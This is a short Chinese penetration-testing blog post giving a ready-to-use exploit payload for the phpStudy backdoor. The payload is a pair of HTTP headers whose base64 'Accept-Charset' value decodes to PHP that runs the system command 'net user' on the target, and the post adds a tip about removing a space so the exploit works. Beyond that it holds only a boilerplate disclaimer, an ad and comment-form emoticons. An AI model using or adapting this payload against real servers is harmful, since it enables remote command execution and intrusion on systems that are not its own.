phpstudy后门漏洞利用payload

OnionT@KillBoy 渗透测试评论9,1092字数 213阅读0分42秒阅读模式

payload:

Accept-Encoding: gzip,deflate
Accept-Charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7

这个后面是base64加密的
注意:这里有个坑就是如果你自己抓包已经有Accept-Encoding: gzip,deflate这个参数,那么记得把,号后面的空格删除了

http://www.oniont.cn/index.php/archives/231.html

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
OnionT@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: